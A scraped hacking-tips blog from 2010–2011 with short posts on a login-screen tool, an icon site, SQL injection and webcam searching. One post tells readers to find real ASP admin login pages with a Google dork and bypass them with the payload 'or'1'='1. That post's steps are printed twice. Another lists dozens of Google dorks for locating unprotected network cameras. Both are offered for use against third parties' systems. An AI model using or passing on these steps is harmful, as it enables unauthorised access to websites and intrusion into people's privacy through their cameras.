Sunday, September 11, 2011
WonderLogin - Windows 7 login screen changer
A simple tweaking software that can be used to change the Windows 7
login screen with a click of a button. No installation is required, just
download it and use it!.
Download from here
Download from here
Thursday, October 7, 2010
Your First Live Hacking Technique
There are many hacking techniques used for hacking a website. Here i am giving you a taste of SQL Injection method. SQL, OS, and LDAP injections occur when untrusted data is sent to an interpreter as part of a command or query. We can trick the interpreter into executing unintended commands. So, follow the below steps carefully. Now most of the sites are designed with SQL Injection in mind, hence the below method only works for poorly designed websites.
1) Go to Google and search for vulnerable ASP sites using "inurl:adminlogin.asp"
2) Choose a result
3) You will get a login window similar like this, use below data to login
Username : admin (always its admin)
Password : 'or'1'='1
4) If you are lucky, you will be redirected to the Admin Panel
5) Finished, you hacked a website!
the theory behind this hack is explained below,
SQL injection is the result of weak coding. Analyzing the above example, the site uses a SQL statement similar below to access and compare username and password from the database.
WARNING:
Any actions and or activities related to the material contained within this Website is solely your responsibility. The author and this sitewill not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
Any actions and or activities related to the material contained within this Website is solely your responsibility. The author and this sitewill not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
1) Go to Google and search for vulnerable ASP sites using "inurl:adminlogin.asp"
2) Choose a result
3) You will get a login window similar like this, use below data to login
Username : admin (always its admin)
Password : 'or'1'='1
4) If you are lucky, you will be redirected to the Admin Panel
5) Finished, you hacked a website!
the theory behind this hack is explained below,
SQL injection is the result of weak coding. Analyzing the above example, the site uses a SQL statement similar below to access and compare username and password from the database.
SELECT username,pwd FROM members WHERE 'username'='given username' AND 'pwd'='given password'
SELECT username,pwd FROM members WHERE 'username'='admin' AND 'pwd'=''or'1'='1'So 1 = 1 will be always true and it proceeds the login. As for your knowledge it will not work with websites made of PHP. I will explain other techniques like XSS attacks in coming days. Happy Hacking!
Iconfinder.com - Search Engine for Icons
Iconfinder.com provides high quality icons for web designers and developers in an easy and efficient way. This is the best place to search, sort, filter, and find icons for any occasion. At the time of this writing the site currently has 318,060 icons in its database!
More than 100000 free icons in one place and you can download all the free icons in PNG or ICO format.
It have a nice filtering option that lets you choose to show only icons that can be used commercially, commercial that doesn’t require a back link or all icons. You can also change the background color of the icons to white, black, or grey. This will let you see what they look like on your site or application.
You can additionally filter the icons by size anywhere from 0 to 512px. This helps you find the proper size without having to re-size and possibly pixelate an icon. If you want to see more icons per page, it gives you the option to see 18, 24 or 48 icons per page.
If you are a firefox user there is an add-on available for iconfiner.com, Install it from here.
Wednesday, October 6, 2010
Viewing Live Webcams Using Google!
Google can be used to view unprotected live web cams around the world. It's a pretty old trick but still works like charm. By using simple Google Search queries, any user that has Internet can logon, access and watch thousands of unprotected surveillance cameras and webcams around the world.Privacy? Once online, there is no privacy. Your computer would only be private WITHOUT internet connections. Once the connection is up, virtually anyone can see you and what you’re doing. So the trick to find and search for open unprotected Internet webcams that broadcast to the web, is by using the following query:
inurl:/view.shtml
or
intitle:”Live View / – AXIS” | inurl:view/view.shtml
The above query will reveal IP network web cameras that able to transmit live footage or individual images across the Internet from Axis Communications.However, contrary to popular believe, most of these webcams found by this trick is naturally meant for public viewing, and normally linked from a public website. Those private webcams attached to PC or used at the living room or bedroom or bathroom are normally won’t be able to find unless the owners purposely let Google crawl the link.
here is more queries,
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1? intext:”Open Menu”
intext:”MOBOTIX M10? intext:”Open Menu”
intext:”MOBOTIX D10? intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console – Web Monitor”
www.drakepeak.net have built a database of live cameras found on the Internet. The database can be accessed directly at: http://www.drakepeak.net/index.php?content=livecams